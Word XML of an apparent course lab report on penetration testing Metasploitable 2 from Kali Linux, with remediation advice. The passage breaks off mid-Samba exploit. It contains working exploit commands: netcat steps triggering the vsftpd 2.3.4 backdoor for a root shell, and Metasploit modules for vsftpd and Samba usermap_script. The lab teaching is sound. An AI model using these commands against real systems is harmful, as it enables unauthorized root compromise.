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Penetration Testing of Metasploitable 2 Using Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup, Exploitation, and Remediation</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Department of Computer Science, University Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Course Number: Course Name</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Due Date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Abstract</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the construction of an isolated virtual penetration-testing laboratory and the assessment of an intentionally vulnerable target. An attacker virtual machine running Kali Linux and a target virtual machine running Metasploitable 2 were deployed on a host-only network to ensure all activity remained contained. Reconnaissance with Nmap identified numerous exposed services, several running outdated or deliberately backdoored software. Three representative attacks were demonstrated: the vsftpd 2.3.4 backdoor (CVE-2011-2523), the Samba usermap_script command injection (CVE-2007-2447), and SQL injection and cross-site scripting within the Damn Vulnerable Web Application. Each vulnerability is analyzed by root cause, impact, and remediation. The findings reinforce core defensive principles: timely patching, elimination of default credentials, encryption of network traffic, and rigorous input validation and output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>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penetration testing, Kali Linux, Metasploitable 2, vulnerability assessment, network security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing of Metasploitable 2 Using Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup, Exploitation, and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands-on experimentation in a controlled environment is a widely accepted method for developing practical security skills. Metasploitable 2 is a purpose-built, intentionally vulnerable Linux virtual machine distributed for training, while Kali Linux is a security-focused distribution that bundles the reconnaissance and exploitation tools used by practitioners (OffSec, n.d.; Rapid7, n.d.). This report describes the laboratory configuration and reports the results of attacking the target. All testing was conducted against the author’s own virtual machines on an isolated host-only network; the techniques shown are illegal when applied to systems without ownership or written authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratory Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtualization and Network Isolation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The laboratory comprised two virtual machines hosted on a single physical computer. A hypervisor (VMware Workstation, VirtualBox, or UTM on Apple Silicon) provided virtualization; hardware virtualization extensions (Intel VT-x or AMD-V) were enabled in firmware to support 64-bit guests. Both virtual machines were attached to a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">host-only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> network so that traffic was confined to the two guests and the host, preventing any interaction with production networks or the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker and Target Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux was deployed from the official prebuilt image and authenticated with its default account. Metasploitable 2 was deployed by attaching its existing virtual disk to a new Linux virtual machine and was authenticated with the documented credentials </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfadmin/msfadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. When 3D graphics acceleration caused instability, disabling it in the virtual machine’s display settings resolved the problem. The target’s address was obtained with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and connectivity between the guests was confirmed with a ping before testing began. The target’s bundled Damn Vulnerable Web Application (DVWA) was reached from the Kali browser and authenticated with its default credentials (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin/password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), confirming that the environment was ready for assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment followed the conventional phases of a penetration test, scaled to the laboratory: reconnaissance and scanning, enumeration, exploitation, and analysis with remediation (Kennedy et al., 2011). All commands were issued from Kali; the placeholder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$TARGET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents the target’s host-only address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET=192.168.56.102   # the Metasploitable 2 IP address</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A full TCP port scan with service and version detection was performed using Nmap to establish the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -sC -p- -T4 $TARGET -oN nmap-full.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The scan revealed a deliberately broad attack surface, including multiple services running outdated or backdoored software. Representative results are summarized in Table 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Representative Open Services on the Metasploitable 2 Target</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9336"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="000000" w:sz="4"/>
          <w:left w:val="none"/>
          <w:bottom w:val="single" w:color="000000" w:sz="4"/>
          <w:right w:val="none"/>
          <w:insideH w:val="none"/>
          <w:insideV w:val="none"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="2900"/>
        <w:gridCol w:w="5336"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5336"/>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Notable issue</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21</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vsftpd 2.3.4</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Backdoored version (CVE-2011-2523)</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22</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OpenSSH 4.7p1</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Outdated; brute-forceable accounts</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23</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Telnet</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Cleartext authentication</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80</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Apache 2.2.8 / PHP 5.2.4</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Hosts DVWA and Mutillidae</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139/445</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Samba 3.x</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usermap_script RCE (CVE-2007-2447)</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3306</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MySQL 5.0.51a</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Blank or weak root password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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5900</w:t>
            </w:r>
          </w:p>
        </w:tc>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VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="53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Weak password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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6667</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5336"/>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Backdoor (CVE-2010-2075)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40" w:line="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Port and version data are illustrative of a typical scan; the exact versions observed in testing justify each exploit discussed below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Three attacks were selected to span distinct vulnerability classes: a network-service backdoor, a service-configuration command injection, and web-application injection flaws.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd 2.3.4 Backdoor (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A compromised distribution of the vsftpd 2.3.4 source opened a command shell on port 6200 whenever a username containing the character sequence “:)” was supplied (MITRE, n.d.-a). The backdoor was triggered manually and, alternatively, through the Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc $TARGET 21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USER test:)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># then connect to the opened shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc $TARGET 6200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id        # -&gt; uid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Metasploit equivalent:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The root cause is a supply-chain compromise: malicious code was introduced into the source archive. The impact is unauthenticated remote code execution with root privileges. Remediation requires obtaining software only from verified repositories, validating cryptographic signatures and hashes before installation, and applying vendor patches promptly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba usermap_script Command Injection (CVE-2007-2447)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba versions 3.0.20 through 3.0.25rc3 passed the supplied username to a shell when a username-map script was configured, so shell metacharacters embedded in the username executed as root (MITRE, n.d.-b).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
